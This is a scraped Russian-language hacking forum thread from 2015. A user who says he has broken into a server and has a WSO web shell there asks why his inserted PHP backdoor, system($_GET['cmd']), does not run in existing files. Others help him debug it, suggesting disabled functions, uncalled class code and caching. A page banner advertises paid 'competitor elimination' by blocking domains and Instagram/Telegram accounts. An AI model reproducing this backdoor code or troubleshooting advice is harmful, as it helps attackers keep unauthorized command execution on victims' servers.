УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Не выполняется мой код в php-файлах

Опции темы

Поиск в этой теме

Опции просмотра

23.12.2015, 21:19

blackbox

Постоянный

Регистрация: 31.12.2011

Сообщений: 362

Провел на форуме:
137056

Репутация: 11

В общем залился на сервер, подумал что нужно забекдорить пару файлов, но тут довольно странная ситуация возникла. Например я взял файл из диры, где лежит мой WSO (в файле описан простенький класс), добавил туда банальное:

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cmd'[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]system[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cmd'[/COLOR][COLOR="#007700"]]);
}[/COLOR][/COLOR]

Но ничего не работает. Создал в папке чистый файл с этим содержимым - вывод отображается. В папке выше лежит htaccess, но там вроде ничего странного не нашел, только rewrite rules. Что это может быть?

24.12.2015, 12:47

BabaDook

Познавший АНТИЧАТ

Регистрация: 09.05.2015

Сообщений: 1,066

Провел на форуме:
238786

Репутация: 40

Цитата:

Сообщение от blackbox

↑
В общем залился на сервер, подумал что нужно забекдорить пару файлов, но тут довольно странная ситуация возникла. Например я взял файл из диры, где лежит мой WSO (в файле описан простенький класс), добавил туда банальное:

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cmd'[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]system[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cmd'[/COLOR][COLOR="#007700"]]);
}[/COLOR][/COLOR]

phpinfo посмотри, наверное там дисабле функцион system exec

24.12.2015, 13:23

blackbox

Постоянный

Регистрация: 31.12.2011

Сообщений: 362

Провел на форуме:
137056

Репутация: 11

Цитата:

Сообщение от BabaDook

↑
phpinfo посмотри, наверное там дисабле функцион system exec

Нет, отключенных функций нету, да и ошибку бы выдало. Если в новом файле прописать, то все работает. А в тех файлах что я изменял даже echo не выводилось.

24.12.2015, 13:41

private_static

Участник форума

Регистрация: 19.05.2015

Сообщений: 117

Провел на форуме:
25535

Репутация: 22

Цитата:

Сообщение от blackbox

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cmd'[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]system[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cmd'[/COLOR][COLOR="#007700"]]);
}[/COLOR][/COLOR]

если в файле описан класс это не значит что экземпляр этого класса создаётся в этом же скрипте

к примеру имеем следующий код в файле test.php:

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]

в данном случае вызова system() не произойдёт если вы обратились к данному скрипту в виде test.php?cmd=whoami, потому что в этом скрипте только определили функцию но не вызвали её

а вот в таком случае всё отработает:

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]

отработает потому что test() вызывается в этом же скрипте

либо вставляйте свой код в место в котором он тут же выполнится, либо ищите где и когда создаётся объект протрояненного класса и уже обращайтесь к скрипту в котором идёт создание этого объекта и работа с его методами

24.12.2015, 15:39

blackbox

Постоянный

Регистрация: 31.12.2011

Сообщений: 362

Провел на форуме:
137056

Репутация: 11

Цитата:

Сообщение от private_static

↑
если в файле описан класс это не значит что экземпляр этого класса создаётся в этом же скрипте
к примеру имеем следующий код в файле test.php:

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]

в данном случае вызова system() не произойдёт если вы обратились к данному скрипту в виде test.php?cmd=whoami, потому что в этом скрипте только определили функцию но не вызвали её
а вот в таком случае всё отработает:

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]

отработает потому что test() вызывается в этом же скрипте
либо вставляйте свой код в место в котором он тут же выполнится, либо ищите где и когда создаётся объект протрояненного класса и уже обращайтесь к скрипту в котором идёт создание этого объекта и работа с его методами

Да, это понятно, я не в классе вставлял код и не в описании функции. Я вынес за пределы, но суть не поменялась. Опять же, резюмируя - когда я добавляю код в существующие файлы, он не выполняется, причем никакой, даже echo, а когда я создал новый файл, но в нем все отработало. Вот.

24.12.2015, 15:51

private_static

Участник форума

Регистрация: 19.05.2015

Сообщений: 117

Провел на форуме:
25535

Репутация: 22

Цитата:

Сообщение от blackbox

↑
Да, это понятно, я не в классе вставлял код и не в описании функции. Я вынес за пределы, но суть не поменялась. Опять же, резюмируя - когда я добавляю код в существующие файлы, он не выполняется, причем никакой, даже echo, а когда я создал новый файл, но в нем все отработало. Вот.

быть может там система кеширования какая стоит